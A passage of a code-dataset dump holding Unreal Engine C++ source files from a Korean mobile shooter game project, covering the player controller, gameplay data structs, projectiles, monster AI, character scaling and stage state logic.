pGameStateStage->GetClearTotalPoint());\n\n\tABCHECK(nullptr != m_pWidgetStageClear);\n\tm_pWidgetStageClear->AddToViewport();\n\tm_pWidgetStageClear->SetVisibility(ESlateVisibility::Visible);\n\tm_pWidgetStageClear->UpdateClearStageLayout();\n}\n\nvoid APG_PlayerController::OnStateFailed()\n{\n\tSetLockJoystickInput(true);\n\tSetPause(true);\n\n\tABCHECK(nullptr != m_pUserWidgetScreenStageFailed);\n\tm_pUserWidgetScreenStageFailed->AddToViewport();\n\tm_pUserWidgetScreenStageFailed->SetVisibility(ESlateVisibility::Visible);\n\tm_pUserWidgetScreenStageFailed->UpdateLayout();\n}\n\nvoid APG_PlayerController::OnFire()\n{\n\tauto pPlayerState = GetPlayerState<APG_MyPlayerState>();\n\tABCHECK(nullptr != pPlayerState);\n\tABCHECK(nullptr != m_pUserWidgetScreenPlayStage)\n\n\tif (false == pPlayerState->UseAmmo())\n\t{\n\t\t// 기본 무기로 바꾼다.\n\t\tpPlayerState->ChangeDefaultWeapon();\n\t\tm_pUserWidgetScreenPlayStage->OnChangeWeapon();\n\t}\n\n\tm_pUserWidgetScreenPlayStage->OnFire();\n}" }, { "alpha_fraction": 0.5857638716697693, "alphanum_fraction": 0.6013888716697693, "avg_line_length": 23.19327735900879, "blob_id": "f09fd110dc0859d2d189f915778cd7a6dc01882b", "content_id": "c264047e623254e63cce0ffa912b2b5e7b3a92a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3414, "license_type": "no_license", "max_line_length": 115, "num_lines": 119, "path": "/Source/Project_Gun/Public/Define/PG_GamePlayData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include \"PG_GamePlayData.generated.h\"\n\n//=========================================================================================\n// 플레이어 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGPlayerData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGPlayerData() : EquipWeaponInventoryIndex(0), bExtendWeaponSlot(false), RewardPoint(0)\n\t{ \n\t\tPlayerWeaponInventory.Init(0, PG_MAX_WEAPON_SLOT);\n\t\tPlayerWeaponAmmo.Init(0, PG_MAX_WEAPON_SLOT);\n\t}\n\n\t// 장착중인 무기의 Inventory의 Index (SlotIndex 저장)\n\tUPROPERTY()\n\tint32 EquipWeaponInventoryIndex;\n\n\t// 인벤토리 (현재 3개까지 
확장 가능)\n\tUPROPERTY()\n\tbool bExtendWeaponSlot;\n\n\t// 인벤토리 (현재 3개까지 확장 가능 - WeaponTableIndex 저장)\n\tUPROPERTY()\n\tTArray<int32> PlayerWeaponInventory;\n\n\t// 탄약 재고량 (SlotIndex 저장)\n\tUPROPERTY()\n\tTArray<int32> PlayerWeaponAmmo;\n\n\t// 보유중인 재화 포인트\n\tUPROPERTY()\n\tint32 RewardPoint;\n};\n\n//=========================================================================================\n// 보유중인 무기 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGWeaponOwnData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGWeaponOwnData() : IsUnlock(false), PowerLevel(1), MagLevel(1){ }\n\n\t// 무기 구매 여부\n\tUPROPERTY()\n\tbool IsUnlock;\n\n\t// 무기 공격력 레벨\n\tUPROPERTY()\n\tint32 PowerLevel;\n\n\t// 탄창 증가 레벨\n\tUPROPERTY()\n\tint32 MagLevel;\n};\n\n//=========================================================================================\n// 스테이지 플레이 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGStagePlayData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGStagePlayData() : StageID(0), NumberOfMonsters(0), NumberOfMonstersKilled(0), \n\t\tNumberOfMonstersMuiltiKill(0), NumberOfMonstersMuiltiKilled(0), PlayTime(0), RemainTime(0), KillRewardPoint(0){ }\n\n\t// 현재 플레이중인 스테이지 ID\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 StageID;\n\n\t// 설치된 몬스터의 수 (클리어 목표)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonsters;\n\n\t// 죽인 몬스터의 수\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonstersKilled;\n\n\t// 다중 처치해야 할 몬스터의 수 (멀티킬 클리어 목표)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonstersMuiltiKill;\n\n\t// 다중 처치한 몬스터의 수 (멀티킬)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonstersMuiltiKilled;\n\n\t// 플레이 시간\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 PlayTime;\n\n\t// 남은 시간\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 RemainTime;\n\n\t// 몬스터 처치로부터 얻은 재화 (스테이지 클리어로 얻은 재화는 포함되지 않으니 주의할 것)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 KillRewardPoint;\n};\n\nenum EStageClearType\n{\n\teSCT_AmountKill = 0,\t\t// 목표한 몬스터 처치 후 목표지점 도달\n\teSCT_ClearTime,\t\t\t\t// 제한시간 내 모든 몬스터 처치 후 목표지점 도달\n\teSCT_Lethal,\t\t\t\t// 필살기 사용으로 목표 멀티킬 이상을 달성 후 목표지점 도달\n\n\teSCT_Max\n};\n\n" }, { "alpha_fraction": 0.7562909126281738, "alphanum_fraction": 0.7614615559577942, "avg_line_length": 25.135135650634766, "blob_id": "f3fa4bfcc1f73ba769789b216e42bdc6c7548331", "content_id": "6bfd1c980edc9afe8c1131d114da8617cb884704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3061, "license_type": "no_license", "max_line_length": 199, "num_lines": 111, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_Projectile.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Define/PG_TableData.h\"\n\n// Sets default values\nAPG_Projectile::APG_Projectile()\n{\n \t// Set this actor to call Tick() every frame. 
You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\t// 구체를 단순 콜리전 표현으로 사용합니다.\n\tCollisionComponent = CreateDefaultSubobject<USphereComponent>(TEXT(\"SphereComponent\"));\n\t// 구체의 콜리전 반경을 설정합니다.\n\tCollisionComponent->InitSphereRadius(50.0f);\n\t// 루트 컴포넌트를 콜리전 컴포넌트로 설정합니다.\n\tCollisionComponent->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\n\tRootComponent = CollisionComponent;\n\n\tvStartPos = FVector::ZeroVector;\n}\n\n// Called when the game starts or when spawned\nvoid APG_Projectile::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_Projectile::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\n// Called every frame\nvoid APG_Projectile::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tif (IsEndBulletRange())\n\t\tDestroy();\n}\n\n// 프로젝타일의 속도를 발사 방향으로 초기화시키는 함수입니다.\nvoid APG_Projectile::FireInDirection(const FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\n}\n\nbool APG_Projectile::IsEndBulletRange()\n{\n\tif (0 == WeaponData.BulletRange)\n\t\treturn false;\t// 무한\n\n\tfloat fBulletRange = FMath::Abs<float>(FVector::Distance(vStartPos, GetActorLocation()));\n\treturn (fBulletRange >= (float)WeaponData.BulletRange);\n}\n\nbool APG_Projectile::IsOwnerMonster()\n{\n\tauto OwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != OwnerWeapon, false);\n\n\treturn OwnerWeapon->IsOwnerMonster();\n}\nbool APG_Projectile::IsOwnerMyPlayer()\n{\n\tauto OwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != OwnerWeapon, false);\n\n\treturn OwnerWeapon->IsOwnerMyPlayer();\n}\n\nbool APG_Projectile::IsAttackNullity(FVector vTargetPos)\n{\n\tFCollisionQueryParams Params(NAME_None, false, this);\n\n\tif (GetWorld()->LineTraceTestByProfile(\n\t\tGetActorLocation(),\n\t\tvTargetPos,\n\t\tTEXT(\"AttackNullity\"),\n\t\tParams)\n\t\t)\n\t{\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\tDrawDebugPoint(GetWorld(), vTargetPos, 10.0f, FColor::Black, false, 1.02f);\n//\t\tDrawDebugLine(GetWorld(), GetActorLocation(), vTargetPos, FColor::Black, false, 1.02f);\n//#endif\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nvoid APG_Projectile::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\n}\n\nvoid APG_Projectile::OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\n}\n\nvoid APG_Projectile::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\n}\n" }, { "alpha_fraction": 0.7594433426856995, "alphanum_fraction": 0.7594433426856995, "avg_line_length": 20.913043975830078, "blob_id": "509cbba88c08826ee550c050c02180ffc534d0fe", "content_id": "c9b730586cef6a15e1b9da374070139bcaf0818b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 505, "license_type": "no_license", "max_line_length": 79, "num_lines": 23, "path": "/Source/Project_Gun/Private/Character/PG_MonCharBoss.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharBoss.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharBoss::APG_MonCharBoss()\n{\n\tAIControllerClass = 
APG_AICon_Mon::StaticClass();\n}\n\nvoid APG_MonCharBoss::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_MonCharBoss::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterData = &MonsterBossData;\n}" }, { "alpha_fraction": 0.7557677030563354, "alphanum_fraction": 0.7621320486068726, "avg_line_length": 26.955554962158203, "blob_id": "bea357c89b4e59b78bfee2fd36549c635cc43b14", "content_id": "aa2ed85361573d45bbc13e9fc09519790d9345da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1259, "license_type": "no_license", "max_line_length": 127, "num_lines": 45, "path": "/Source/Project_Gun/Private/Character/Component/PG_ComponentCharScale.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/Component/PG_ComponentCharScale.h\"\n\n// Sets default values for this component's properties\nUPG_ComponentCharScale::UPG_ComponentCharScale()\n{\n\t// Set this component to be initialized when the game starts, and to be ticked every frame. You can turn these features\n\t// off to improve performance if you don't need them.\n\tPrimaryComponentTick.bCanEverTick = false;\n\n\t// ...\n}\n\n\n// Called when the game starts\nvoid UPG_ComponentCharScale::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\n\n// Called every frame\nvoid UPG_ComponentCharScale::TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction)\n{\n\tSuper::TickComponent(DeltaTime, TickType, ThisTickFunction);\n}\n\nvoid UPG_ComponentCharScale::SetActorScaleRange(FVector MinScale, FVector MaxScale)\n{\n\tm_vMinScale = MinScale;\n\tm_vMaxScale = MaxScale;\n}\n\nvoid UPG_ComponentCharScale::SetActorScale(float Ratio)\n{\n\tABCHECK(0 <= Ratio && Ratio <= 1.0f);\n\n\tFVector vNormal = m_vMaxScale - m_vMinScale;\n\tFVector vScale = m_vMinScale + (vNormal * FMath::Clamp<float>(Ratio, 0.0f, 1.0f));\n\n\tauto OwnerActor = GetOwner();\n\tif (OwnerActor)\n\t\tOwnerActor->SetActorRelativeScale3D(vScale);\n}" }, { "alpha_fraction": 0.5992695689201355, "alphanum_fraction": 0.6052457094192505, "avg_line_length": 29.1200008392334, "blob_id": "1c464179b5cb351ee33604dc27450540b2856ee5", "content_id": "26b858dc7fb2ed1c13aa66c7ba1d4fa5f367dd0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3460, "license_type": "no_license", "max_line_length": 110, "num_lines": 100, "path": "/Source/Project_Gun/Public/Game/GameState/PG_GameStateStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/GameStateBase.h>\n#include \"PG_GameStateStage.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnStageTimer);\nDECLARE_MULTICAST_DELEGATE(FOnStageClear);\nDECLARE_MULTICAST_DELEGATE(FOnStageFailed);\nDECLARE_MULTICAST_DELEGATE(FOnUdpateWidgetPlayStage);\nDECLARE_MULTICAST_DELEGATE(FOnGateOpen);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnViewAD, bool);\n\n/**\n * GameState : 게임의 상태를 정의한다. 
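// --- Illustrative sketch, not taken from the original Project_Gun sources -------------------
// Standalone restatement of the interpolation used by UPG_ComponentCharScale::SetActorScale
// above: the actor scale is a linear blend between a minimum and maximum scale, driven by a
// ratio clamped to [0, 1]; elsewhere in the project the monster character drives this with
// its HP ratio, so the body scale tracks remaining health. Plain standard C++; the Vec3
// stand-in and the ScaleForRatio name are hypothetical.
#include <algorithm>

struct Vec3 { float X, Y, Z; };             // simplified stand-in for FVector

inline Vec3 ScaleForRatio(const Vec3& MinScale, const Vec3& MaxScale, float Ratio)
{
    const float T = std::clamp(Ratio, 0.0f, 1.0f);            // same clamp as FMath::Clamp
    return { MinScale.X + (MaxScale.X - MinScale.X) * T,       // component-wise lerp,
             MinScale.Y + (MaxScale.Y - MinScale.Y) * T,       // identical in form to
             MinScale.Z + (MaxScale.Z - MinScale.Z) * T };     // Min + (Max - Min) * Ratio
}
// e.g. ScaleForRatio({0.5f,0.5f,0.5f}, {1,1,1}, 0.25f) yields {0.625f, 0.625f, 0.625f}.
// --- End of illustrative sketch --------------------------------------------------------------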
게임이 시작되었는지, 중단되었는지, A팀의 스토어가 몇점인지 등을 포함한다.\n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameStateStage : public AGameStateBase\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_GameStateStage();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\n\npublic:\n\tbool\tInitStageData();\n\n\tvoid\tMonsterDie(class APG_MonChar* KillMon, bool IsLethalAttack);\n\n\t//===================================================\n\t// Stage Info.\n\t//===================================================\n\tconst struct FPGStagePlayData*\tGetStagePlayData()\t{ return &StagePlayData; }\n\tint32\tGetLevelInstallMonsterCount();\t// 현재 레벨에 설치된 몬스터의 수\n\tint32\tGetRemainStageTimer();\t\t\t// 현재 남은 시간\n\tvoid\tSetMaxLethalKill(int32 a_nMaxLethalKill);\t// 필살기로 죽인 몬스터 수 갱신\n\tint32\tGetMaxLethalKill();\t\t\t\t\t\t\t// 필살기로 죽은 최대 몬스터의 수\n\t// Stage Clear Info.\n\tint32\tGetClearTotalPoint();\t\t\t// 획득한 포인트 (총합 : 스테이지 클리어 + 미션 클리어 + 몬스터 처치 + 광고)\n\tint32\tGetClearStagePoint();\t\t\t// 스테이지 클리어 포인트\n\tint32\tGetClearMissionPoint();\t\t\t// 미션 클리어 포인트\n\tint32\tGetClearMonsterKillPoint();\t\t// 몬스터 처치 포인트\n\n\n\t//===================================================\n\t// AD (광고)\n\t//===================================================\n\tbool\tIsViewAD();\t\t\t\t\t// 광고를 보았는지 확인\n\tvoid\tSetViewAD(bool bEnable);\n\tbool\tRequestViewAD();\t\t\t// 광고 요청\n\npublic:\n\t//==========================================================\n\t// Stage\n\t//==========================================================\n\tFOnStageTimer\tStageTimerDelegate;\t\t// 스테이지 타이머\n\tFOnStageClear\tStageClearDelegate;\t\t// 스테이지 클리어\n\tFOnStageFailed\tStageFailedDelegate;\t// 스테이지 실패\n\tFOnGateOpen\t\tGateOpenDelegate;\t\t// 스테이지 클리어 게이트 오픈\n\tFOnUdpateWidgetPlayStage UdpateWidgetPlayStage;\t\t// 스테이지 클리어 목표 현황 업데이트 요청\n\n\t//==========================================================\n\t// AD\n\t//==========================================================\n\tFOnViewAD\t\tOnViewAD;\t\t\t\t// 광고를 보았음\n\npublic:\n\tvoid\tOnCheckStageClear();\n\tvoid\tOnCheckStageFailed();\n\n\tUFUNCTION()\n\tvoid\tOnKillAddRewardPoint(int32 a_nAddRewardPoint);\t// 몬스터 처치로 인한 포인트 획득\n\nprotected :\n\tvoid\tOnStageTimerTick();\n\nprivate :\n\tbool\tCheckStageData();\n\nprivate :\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG StageData\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGStagePlayData StagePlayData;\n\n\tUPROPERTY()\n\tFTimerHandle StageTimerHandle;\n\n\tconst struct FPGStageData* StageData;\n\n\t//===================================================\n\t// AD (광고)\n\t//===================================================\n\tbool m_bViewAD = false;\n};\n" }, { "alpha_fraction": 0.7371019721031189, "alphanum_fraction": 0.7450012564659119, "avg_line_length": 25.054662704467773, "blob_id": "62427a44219e1e66ce80d43b3cc9c1587fcdb39d", "content_id": "0da98f88e390bd500e6e5ffa37f5b3753074bea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8224, "license_type": "no_license", "max_line_length": 159, "num_lines": 311, "path": "/Source/Project_Gun/Private/Character/PG_MonChar.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/Component/PG_ComponentCharScale.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include 
\"Game/GameState/PG_GameStateStage.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\n#include <Components/WidgetComponent.h>\n#include <Components/ProgressBar.h>\n#include <GameFramework/DamageType.h>\n#include <DrawDebugHelpers.h>\n\n// Sets default values\nAPG_MonChar::APG_MonChar()\n{\n \t// Set this character to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n#ifdef TEST_CODE\n\t// 임시코드 : 가데이터 몬스터 리소스 위치 수정\n\tGetMesh()->SetRelativeLocationAndRotation(FVector(0.0f, 0.0f, -88.0f), FRotator(0.0f, -90.0f, 0.0f));\n#endif\n\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n\n\tCharScaleComponent = CreateDefaultSubobject<UPG_ComponentCharScale>(TEXT(\"CHARSCALECOMPONENT\"));\n\n\t// 플레이어 오버랩 이벤트 설정\n\tGetCapsuleComponent()->OnComponentBeginOverlap.AddDynamic(this, &APG_MonChar::OnCharacterHit);\n\tGetCapsuleComponent()->OnComponentHit.AddDynamic(this, &APG_MonChar::OnHitCallback);\n\n#ifdef ENABLE_DRAW_DEBUG\n\tHPBarWidget = CreateDefaultSubobject<UWidgetComponent>(TEXT(\"HPBARWIDGET\"));\n\tHPBarWidget->SetupAttachment(GetMesh());\n\tHPBarWidget->SetRelativeLocation(FVector(0.0f, 0.0f, 180.0f));\n\tHPBarWidget->SetWidgetSpace(EWidgetSpace::Screen);\n\tstatic ConstructorHelpers::FClassFinder<UUserWidget> UI_HUD(TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_HPBar.WB_HPBar_C'\"));\n\tif (UI_HUD.Succeeded())\n\t{\n\t\tHPBarWidget->SetWidgetClass(UI_HUD.Class);\n\t\tHPBarWidget->SetDrawSize(FVector2D(50.0f, 50.0f));\n\t}\n#endif\n\n\tm_fMaxHP = 0.0f;\n}\n\n// Called when the game starts or when spawned\nvoid APG_MonChar::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n#ifdef ENABLE_DRAW_DEBUG\n\tif (HPBarWidget)\n\t\tHPBarWidget->SetHiddenInGame(true);\n#endif\n\n\tABCHECK(SetDefaultMonsterData());\n\n\tABCHECK(CharScaleComponent);\n\tCharScaleComponent->SetActorScaleRange(m_vBeginScale * MonsterData->MBodyScale, m_vBeginScale);\n\tSetHP(MonsterData->MHP);\n\n\tABCHECK(RunAI());\n}\n\nvoid APG_MonChar::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\tm_vBeginScale = GetCapsuleComponent()->GetComponentScale();\n}\n\nvoid APG_MonChar::FellOutOfWorld(const class UDamageType& dmgType)\n{\n\tif (dmgType.bCausedByWorld)\n\t\tSetDie(false);\n\telse\n\t\tSuper::FellOutOfWorld(dmgType);\n}\n\n// Called every frame\nvoid APG_MonChar::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tUpdateRotation(DeltaTime);\n}\n\n// Called to bind functionality to input\nvoid APG_MonChar::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)\n{\n\tSuper::SetupPlayerInputComponent(PlayerInputComponent);\n}\n\nvoid APG_MonChar::UpdateRotation(float DeltaTime)\n{\n\t// 몬스터가 움직이지 않고 캐릭터 방향으로 회전해야하는 경우\n\tif (m_bDoNotMoving && false == m_bDoNotRotation)\n\t{\n\t\tAPG_MyChar* pPG_MyChar = FindTargetToMyChar();\n\t\tif (pPG_MyChar)\n\t\t{\n\t\t\tFRotator PlayerRot = UKismetMathLibrary::FindLookAtRotation(GetActorLocation(), pPG_MyChar->GetActorLocation());\n\t\t\tFRotator rotator = FMath::RInterpTo(m_vTargetRotation, PlayerRot, DeltaTime, MonsterData->MRotateSpeed);\n\t\t\trotator.Pitch = 0.0f;\n\t\t\tm_vTargetRotation = rotator;\n\t\t\tSetActorRotation(rotator);\n\t\t}\n\t\telse\n\t\t{\n\t\t\tm_vTargetRotation = GetActorRotation();\n\t\t}\n\t}\n}\n\nvoid APG_MonChar::OnCharacterHit(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp,\n\tint32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto PlayerCharacter = Cast<APG_MyChar>(OtherActor);\n\tif 
(PlayerCharacter)\n\t{\n\t\t//ABLOG(Warning, TEXT(\"Attack Actor : %s\"), *GetName());\n\t\tPlayerCharacter->OnAttackedByMonster();\n\t\treturn;\n\t}\n}\n\nvoid APG_MonChar::OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\n}\n\nbool APG_MonChar::RunAI()\n{\n\tAIController = Cast<APG_AICon_Mon>(GetController());\n\tif (nullptr == AIController)\n\t{\n\t\tSpawnDefaultController();\n\t\tAIController = Cast<APG_AICon_Mon>(GetController());\n\t}\n\n\tABCHECK(nullptr != AIController, false);\n\n\treturn AIController->RunAI();\n}\n\nvoid APG_MonChar::StopAI()\n{\n\tABCHECK(nullptr != AIController);\n\tAIController->StopAI();\n}\n\nvoid APG_MonChar::SetHP(int32 nHP)\n{\n\tMonsterData->MHP = nHP;\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\tUProgressBar* HPProgressBar = Cast<UProgressBar>(HPBarWidget->GetUserWidgetObject()->GetWidgetFromName(TEXT(\"PB_HPBar\")));\n//\tif (HPProgressBar)\n//\t{\n//\t\tHPProgressBar->SetPercent(GetHPRatio());\n//\t}\n//#endif\n\n\tif (CharScaleComponent)\n\t\tCharScaleComponent->SetActorScale(GetHPRatio());\n}\n\nvoid APG_MonChar::SetDie(bool IsUseLetharAttack)\n{\n\tAPG_GameStateStage* AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (AGameStateStage)\n\t{\n\t\tAGameStateStage->MonsterDie(this, IsUseLetharAttack);\n\t\tDestroy();\n\t}\n\telse\n\t{\n\t\tABLOG_S(Warning);\n\t}\n}\n\nconst FPGMonsterData* APG_MonChar::GetMonsterData()\n{\n\treturn MonsterData;\n}\n\nint32 APG_MonChar::GetDetectRange() const\n{\n\treturn MonsterData ? MonsterData->MDetectRange : 0;\n}\n\nint32 APG_MonChar::GetChaseRange() const\n{\n\treturn MonsterData ? MonsterData->MChaseRange : 0;\n}\n\nfloat APG_MonChar::GetHPRatio() const\n{\n\tABCHECK(MonsterData, 0.0f);\n\n\treturn (MonsterData->MHP <= 0) ? 0.0f : ((float)MonsterData->MHP / (float)m_fMaxHP);\n}\n\nfloat APG_MonChar::GetMaxHP() const\n{\n\treturn m_fMaxHP;\n}\n\nfloat APG_MonChar::GetDropRate() const\n{\n\treturn MonsterData ? 
MonsterData->MDropRate : 0.0f;\n}\n\nAPG_MyChar* APG_MonChar::FindTargetToMyChar()\n{\n\tauto pMyChar = Cast<APG_MyChar>(GetWorld()->GetFirstPlayerController()->GetCharacter());\n\tABCHECK(nullptr != pMyChar, nullptr);\n\n\tFVector vMonLocation = GetActorLocation();\n\tFVector vPlayerLocation = pMyChar->GetActorLocation();\n\n\tif (FMath::Abs<int32>(FVector::Distance(vMonLocation, vPlayerLocation)) <= GetDetectRange())\n\t\treturn pMyChar;\n\n\treturn nullptr;\n}\n\nbool APG_MonChar::SetDefaultMonsterData()\n{\n\tABCHECK(nullptr != MonsterData, false);\n\n\tbUseControllerRotationYaw = false;\n\t\n\tm_bDoNotRotation = (0.0f >= MonsterData->MRotateSpeed);\n\tm_bDoNotMoving = (0.0f >= MonsterData->MSpeed);\n\tGetCharacterMovement()->bOrientRotationToMovement = !m_bDoNotRotation;\n\tGetCharacterMovement()->bUseControllerDesiredRotation = !m_bDoNotRotation;\n\tif (false == m_bDoNotRotation)\n\t\tGetCharacterMovement()->RotationRate = FRotator(0.0f, MonsterData->MRotateSpeed, 0.0f);\n\tGetCharacterMovement()->MaxWalkSpeed = MonsterData->MSpeed;\n\tGetCharacterMovement()->MaxAcceleration = MonsterData->MAcceleration;\n\n\n\t// 콜리전 설정\n\tif (MonsterData->MCollide)\n\t\tGetCapsuleComponent()->SetCollisionProfileName(TEXT(\"Monster\"));\n\telse\n\t\tGetCapsuleComponent()->SetCollisionProfileName(TEXT(\"Monster_NoCollide\"));\n\n\tm_fMaxHP = MonsterData->MHP;\n\tSetHP(MonsterData->MHP);\n\n\treturn true;\n}\n\nvoid APG_MonChar::OnAssetLoadCharacterCompleted()\n{\n\tABCHECK(AssetStreamingHandle.IsValid());\n\n\tUSkeletalMesh* AssetLoaded = Cast<USkeletalMesh>(AssetStreamingHandle->GetLoadedAsset());\n\tAssetStreamingHandle.Reset();\n\tABCHECK(nullptr != AssetLoaded);\n\tGetMesh()->SetSkeletalMesh(AssetLoaded);\n\n\n\tAIController = Cast<APG_AICon_Mon>(GetController());\n\tABCHECK(nullptr != AIController);\n\n\tif (false == AIController->RunAI())\n\t{\n\t\tABLOG(Warning, TEXT(\"AIController RunAI Failed!!\"));\n\t}\n}\n\nbool APG_MonChar::OnDamage(int32 nDamage, bool IsUseLetharAttack/* = false*/)\n{\n\tSetHP(MonsterData->MHP - nDamage);\n\n\tif (MonsterData->MHP <= 0.0f)\n\t{\n\t\t// Die\n\t\tSetDie(IsUseLetharAttack);\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nvoid APG_MonChar::DebugOnly()\n{\n\t//if (ChangeMonsterData)\n\t//{\n\t//\tif (ID != MonsterData.ID)\n\t//\t{\n\t//\t\tauto PGGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t//\t\tABCHECK(nullptr != PGGameInstance);\n\t//\t\tconst FPGMonsterData* pMonsterData = PGGameInstance->GetMonsterData(MonsterType, MonsterData.ID);\n\t//\t\tif (pMonsterData)\n\t//\t\t{\n\t//\t\t\tMonsterData = *pMonsterData;\n\t//\t\t\tAssetLoadCharacter(pMonsterData->MMeshPath->GetPathName());\n\t//\t\t}\n\t//\t}\n\n\t//\tSetDefaultMonsterData(&MonsterData);\n\t//\tChangeMonsterData = false;\n\t//}\n}" }, { "alpha_fraction": 0.6215469837188721, "alphanum_fraction": 0.6215469837188721, "avg_line_length": 23.965517044067383, "blob_id": "579a6b6666785cbe7e350cf94d5aa25113a3c94d", "content_id": "f36766f1ed38532738c1274688fe76d338a26705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1544, "license_type": "no_license", "max_line_length": 95, "num_lines": 58, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetStageFailed.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include 
